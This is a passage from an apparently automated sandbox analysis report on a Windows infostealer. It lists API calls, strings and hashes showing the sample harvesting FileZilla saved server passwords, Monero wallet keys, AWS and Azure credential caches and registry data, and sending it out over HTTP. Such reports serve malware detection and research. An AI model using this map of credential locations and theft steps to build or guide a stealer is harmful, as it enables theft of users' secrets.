                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                      • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                      • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                      • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                      APIs
                        • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                        • Part of subcall function 001D8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 001D8E0B
                        • Part of subcall function 001DA920: lstrcpy.KERNEL32(00000000,?), ref: 001DA972
                        • Part of subcall function 001DA920: lstrcat.KERNEL32(00000000), ref: 001DA982
                        • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                        • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,00E39130,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                        • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                        • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                        • Part of subcall function 001DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001DA7E6
                        • Part of subcall function 001C99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001C99EC
                        • Part of subcall function 001C99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 001C9A11
                        • Part of subcall function 001C99C0: LocalAlloc.KERNEL32(00000040,?), ref: 001C9A31
                        • Part of subcall function 001C99C0: ReadFile.KERNEL32(000000FF,?,00000000,001C148F,00000000), ref: 001C9A5A
                        • Part of subcall function 001C99C0: LocalFree.KERNEL32(001C148F), ref: 001C9A90
                        • Part of subcall function 001C99C0: CloseHandle.KERNEL32(000000FF), ref: 001C9A9A
                        • Part of subcall function 001D8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 001D8E52
                      • GetProcessHeap.KERNEL32(00000000,000F423F,001E0DBA,001E0DB7,001E0DB6,001E0DB3), ref: 001D0362
                      • RtlAllocateHeap.NTDLL(00000000), ref: 001D0369
                      • StrStrA.SHLWAPI(00000000,<Host>), ref: 001D0385
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001E0DB2), ref: 001D0393
                      • StrStrA.SHLWAPI(00000000,<Port>), ref: 001D03CF
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001E0DB2), ref: 001D03DD
                      • StrStrA.SHLWAPI(00000000,<User>), ref: 001D0419
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001E0DB2), ref: 001D0427
                      • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 001D0463
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001E0DB2), ref: 001D0475
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001E0DB2), ref: 001D0502
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001E0DB2), ref: 001D051A
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001E0DB2), ref: 001D0532
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001E0DB2), ref: 001D054A
                      • lstrcat.KERNEL32(?,browser: FileZilla), ref: 001D0562
                      • lstrcat.KERNEL32(?,profile: null), ref: 001D0571
                      • lstrcat.KERNEL32(?,url: ), ref: 001D0580
                      • lstrcat.KERNEL32(?,00000000), ref: 001D0593
                      • lstrcat.KERNEL32(?,001E1678), ref: 001D05A2
                      • lstrcat.KERNEL32(?,00000000), ref: 001D05B5
                      • lstrcat.KERNEL32(?,001E167C), ref: 001D05C4
                      • lstrcat.KERNEL32(?,login: ), ref: 001D05D3
                      • lstrcat.KERNEL32(?,00000000), ref: 001D05E6
                      • lstrcat.KERNEL32(?,001E1688), ref: 001D05F5
                      • lstrcat.KERNEL32(?,password: ), ref: 001D0604
                      • lstrcat.KERNEL32(?,00000000), ref: 001D0617
                      • lstrcat.KERNEL32(?,001E1698), ref: 001D0626
                      • lstrcat.KERNEL32(?,001E169C), ref: 001D0635
                      • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001E0DB2), ref: 001D068E
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                      • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                      • API String ID: 1942843190-555421843
                      • Opcode ID: effcd5c100b2f15262818afd6507500d3cadce61ce8ef1dc9c44c10efb7b04cb
                      • Instruction ID: 966a6b4a1e1151fdf2df322cc6f4678676a2f61bb880db51aa5697ab1fe10acd
                      • Opcode Fuzzy Hash: effcd5c100b2f15262818afd6507500d3cadce61ce8ef1dc9c44c10efb7b04cb
                      • Instruction Fuzzy Hash: 50D11172900248ABCB04EBF4DD95EEE7338BF68301F808519F502B7191EF74AA45DB66
                      APIs
                        • Part of subcall function 001DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001DA7E6
                        • Part of subcall function 001C47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 001C4839
                        • Part of subcall function 001C47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 001C4849
                        • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 001C59F8
                      • StrCmpCA.SHLWAPI(?,00E3EA28), ref: 001C5A13
                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 001C5B93
                      • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00E3E928,00000000,?,00E3A220,00000000,?,001E1A1C), ref: 001C5E71
                      • lstrlen.KERNEL32(00000000), ref: 001C5E82
                      • GetProcessHeap.KERNEL32(00000000,?), ref: 001C5E93
                      • RtlAllocateHeap.NTDLL(00000000), ref: 001C5E9A
                      • lstrlen.KERNEL32(00000000), ref: 001C5EAF
                      • lstrlen.KERNEL32(00000000), ref: 001C5ED8
                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 001C5EF1
                      • lstrlen.KERNEL32(00000000,?,?), ref: 001C5F1B
                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 001C5F2F
                      • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 001C5F4C
                      • InternetCloseHandle.WININET(00000000), ref: 001C5FB0
                      • InternetCloseHandle.WININET(00000000), ref: 001C5FBD
                      • HttpOpenRequestA.WININET(00000000,00E3E948,?,00E3E3A0,00000000,00000000,00400100,00000000), ref: 001C5BF8
                        • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,00E39130,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                        • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                        • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                        • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                        • Part of subcall function 001DA920: lstrcpy.KERNEL32(00000000,?), ref: 001DA972
                        • Part of subcall function 001DA920: lstrcat.KERNEL32(00000000), ref: 001DA982
                      • InternetCloseHandle.WININET(00000000), ref: 001C5FC7
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                      • String ID: "$"$($($------$------$------$H$
                      • API String ID: 874700897-3552240116
                      • Opcode ID: b86f0f56b74fbc9d124d88caa640e3e42f8ab90b1a0164ed50e99da390e9a285
                      • Instruction ID: bd28d329da05928956c2bc41444da3b47692ebb60b9073e61b19f274c68e5d66
                      • Opcode Fuzzy Hash: b86f0f56b74fbc9d124d88caa640e3e42f8ab90b1a0164ed50e99da390e9a285
                      • Instruction Fuzzy Hash: 7A122271820168ABDB19EBA0DCA5FEE7378BF24701F8041AAF50673191EF706A49CF55
                      APIs
                        • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                        • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,00E39130,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                        • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                        • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                        • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                        • Part of subcall function 001D8B60: GetSystemTime.KERNEL32(001E0E1A,00E3A280,001E05AE,?,?,001C13F9,?,0000001A,001E0E1A,00000000,?,00E39130,?,\Monero\wallet.keys,001E0E17), ref: 001D8B86
                        • Part of subcall function 001DA920: lstrcpy.KERNEL32(00000000,?), ref: 001DA972
                        • Part of subcall function 001DA920: lstrcat.KERNEL32(00000000), ref: 001DA982
                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 001CCF83
                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 001CD0C7
                      • RtlAllocateHeap.NTDLL(00000000), ref: 001CD0CE
                      • lstrcat.KERNEL32(?,00000000), ref: 001CD208
                      • lstrcat.KERNEL32(?,001E1478), ref: 001CD217
                      • lstrcat.KERNEL32(?,00000000), ref: 001CD22A
                      • lstrcat.KERNEL32(?,001E147C), ref: 001CD239
                      • lstrcat.KERNEL32(?,00000000), ref: 001CD24C
                      • lstrcat.KERNEL32(?,001E1480), ref: 001CD25B
                      • lstrcat.KERNEL32(?,00000000), ref: 001CD26E
                      • lstrcat.KERNEL32(?,001E1484), ref: 001CD27D
                      • lstrcat.KERNEL32(?,00000000), ref: 001CD290
                      • lstrcat.KERNEL32(?,001E1488), ref: 001CD29F
                      • lstrcat.KERNEL32(?,00000000), ref: 001CD2B2
                      • lstrcat.KERNEL32(?,001E148C), ref: 001CD2C1
                      • lstrcat.KERNEL32(?,00000000), ref: 001CD2D4
                      • lstrcat.KERNEL32(?,001E1490), ref: 001CD2E3
                        • Part of subcall function 001DA820: lstrlen.KERNEL32(001C4F05,?,?,001C4F05,001E0DDE), ref: 001DA82B
                        • Part of subcall function 001DA820: lstrcpy.KERNEL32(001E0DDE,00000000), ref: 001DA885
                      • lstrlen.KERNEL32(?), ref: 001CD32A
                      • lstrlen.KERNEL32(?), ref: 001CD339
                        • Part of subcall function 001DAA70: StrCmpCA.SHLWAPI(00E38ED0,001CA7A7,?,001CA7A7,00E38ED0), ref: 001DAA8F
                      • DeleteFileA.KERNEL32(00000000), ref: 001CD3B4
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                      • String ID:
                      • API String ID: 1956182324-0
                      • Opcode ID: f047c622f00610c9ca8de71fd143c19f14e163f81d16eaff0d8738028ab57926
                      • Instruction ID: 4d06bf507ca74a6116ab75695c20b0474f942abba1576efd66114a49e5d7fb26
                      • Opcode Fuzzy Hash: f047c622f00610c9ca8de71fd143c19f14e163f81d16eaff0d8738028ab57926
                      • Instruction Fuzzy Hash: B7E16F72810218ABCB04FBA0DD96EEE7338BF24301F904169F507B7291DF35AA15DB66
                      APIs
                        • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                      • RegOpenKeyExA.ADVAPI32(00000000,00E3B528,00000000,00020019,00000000,001E05B6), ref: 001D83A4
                      • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 001D8426
                      • wsprintfA.USER32 ref: 001D8459
                      • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 001D847B
                      • RegCloseKey.ADVAPI32(00000000), ref: 001D848C
                      • RegCloseKey.ADVAPI32(00000000), ref: 001D8499
                        • Part of subcall function 001DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001DA7E6
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CloseOpenlstrcpy$Enumwsprintf
                      • String ID: - $ $%s\%s$?
                      • API String ID: 3246050789-1613996215
                      • Opcode ID: 50a8d11458ab744efdf9285bae1c0de2d814fac27774b8ee2d80616e688cb7e9
                      • Instruction ID: c9df9a9b01e2b92fdee8e068cd88abf40695c5a031d056df881d44b5eb0bb462
                      • Opcode Fuzzy Hash: 50a8d11458ab744efdf9285bae1c0de2d814fac27774b8ee2d80616e688cb7e9
                      • Instruction Fuzzy Hash: 75811F71910228ABDB28DF54CD95FEA77B8FF18700F4082D9E509A6240DF71AB85CF95
                      APIs
                        • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                        • Part of subcall function 001DA920: lstrcpy.KERNEL32(00000000,?), ref: 001DA972
                        • Part of subcall function 001DA920: lstrcat.KERNEL32(00000000), ref: 001DA982
                        • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                        • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,00E39130,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                        • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                        • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00E3D1F8,00000000,?,001E144C,00000000,?,?), ref: 001CCA6C
                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 001CCA89
                      • GetFileSize.KERNEL32(00000000,00000000), ref: 001CCA95
                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 001CCAA8
                      • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 001CCAD9
                      • StrStrA.SHLWAPI(?,00E3D2D0,001E0B52), ref: 001CCAF7
                      • StrStrA.SHLWAPI(00000000,00E3D210), ref: 001CCB1E
                      • StrStrA.SHLWAPI(?,00E3DAC0,00000000,?,001E1458,00000000,?,00000000,00000000,?,00E38F00,00000000,?,001E1454,00000000,?), ref: 001CCCA2
                      • StrStrA.SHLWAPI(00000000,00E3DA80), ref: 001CCCB9
                        • Part of subcall function 001CC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 001CC871
                        • Part of subcall function 001CC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 001CC87C
                      • StrStrA.SHLWAPI(?,00E3DA80,00000000,?,001E145C,00000000,?,00000000,00E39010), ref: 001CCD5A
                      • StrStrA.SHLWAPI(00000000,00E39090), ref: 001CCD71
                        • Part of subcall function 001CC820: lstrcat.KERNEL32(?,001E0B46), ref: 001CC943
                        • Part of subcall function 001CC820: lstrcat.KERNEL32(?,001E0B47), ref: 001CC957
                        • Part of subcall function 001CC820: lstrcat.KERNEL32(?,001E0B4E), ref: 001CC978
                      • lstrlen.KERNEL32(00000000), ref: 001CCE44
                      • CloseHandle.KERNEL32(00000000), ref: 001CCE9C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                      • String ID:
                      • API String ID: 3744635739-3916222277
                      • Opcode ID: 2006263ec960d4714c5ec74ffb3ecd9872b1f757be97b84ee78810620d2e8ea2
                      • Instruction ID: 528c9720f4476e76c469a1afc1f65a996345cc9b218cbd37d2cfc54a34d5042b
                      • Opcode Fuzzy Hash: 2006263ec960d4714c5ec74ffb3ecd9872b1f757be97b84ee78810620d2e8ea2
                      • Instruction Fuzzy Hash: 09E14771C00158ABDB14EBA4DD95FEE7778AF24300F80416AF50677291EF306A4ACF66
                      APIs
                        • Part of subcall function 001D8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 001D8E0B
                      • lstrcat.KERNEL32(?,00000000), ref: 001D4DB0
                      • lstrcat.KERNEL32(?,\.azure\), ref: 001D4DCD
                        • Part of subcall function 001D4910: wsprintfA.USER32 ref: 001D492C
                        • Part of subcall function 001D4910: FindFirstFileA.KERNEL32(?,?), ref: 001D4943
                      • lstrcat.KERNEL32(?,00000000), ref: 001D4E3C
                      • lstrcat.KERNEL32(?,\.aws\), ref: 001D4E59
                        • Part of subcall function 001D4910: StrCmpCA.SHLWAPI(?,001E0FDC), ref: 001D4971
                        • Part of subcall function 001D4910: StrCmpCA.SHLWAPI(?,001E0FE0), ref: 001D4987
                        • Part of subcall function 001D4910: FindNextFileA.KERNEL32(000000FF,?), ref: 001D4B7D
                        • Part of subcall function 001D4910: FindClose.KERNEL32(000000FF), ref: 001D4B92
                      • lstrcat.KERNEL32(?,00000000), ref: 001D4EC8
                      • lstrcat.KERNEL32(?,\.IdentityService\), ref: 001D4EE5
                        • Part of subcall function 001D4910: wsprintfA.USER32 ref: 001D49B0
                        • Part of subcall function 001D4910: StrCmpCA.SHLWAPI(?,001E08D2), ref: 001D49C5
                        • Part of subcall function 001D4910: wsprintfA.USER32 ref: 001D49E2
                        • Part of subcall function 001D4910: PathMatchSpecA.SHLWAPI(?,?), ref: 001D4A1E
                        • Part of subcall function 001D4910: lstrcat.KERNEL32(?,00E3EAB8), ref: 001D4A4A
                        • Part of subcall function 001D4910: lstrcat.KERNEL32(?,001E0FF8), ref: 001D4A5C
                        • Part of subcall function 001D4910: lstrcat.KERNEL32(?,?), ref: 001D4A70
                        • Part of subcall function 001D4910: lstrcat.KERNEL32(?,001E0FFC), ref: 001D4A82
                        • Part of subcall function 001D4910: lstrcat.KERNEL32(?,?), ref: 001D4A96
                        • Part of subcall function 001D4910: CopyFileA.KERNEL32(?,?,00000001), ref: 001D4AAC
                        • Part of subcall function 001D4910: DeleteFileA.KERNEL32(?), ref: 001D4B31
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                      • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                      • API String ID: 949356159-974132213
                      • Opcode ID: 39f3ce348de73e09cd7b5e0819815f67d12e43c96d2673afde11992b039fb5b9
                      • Instruction ID: 679b5e13bd04e69677b741882de2c60efd879519a6d26828af24764c39c4884e
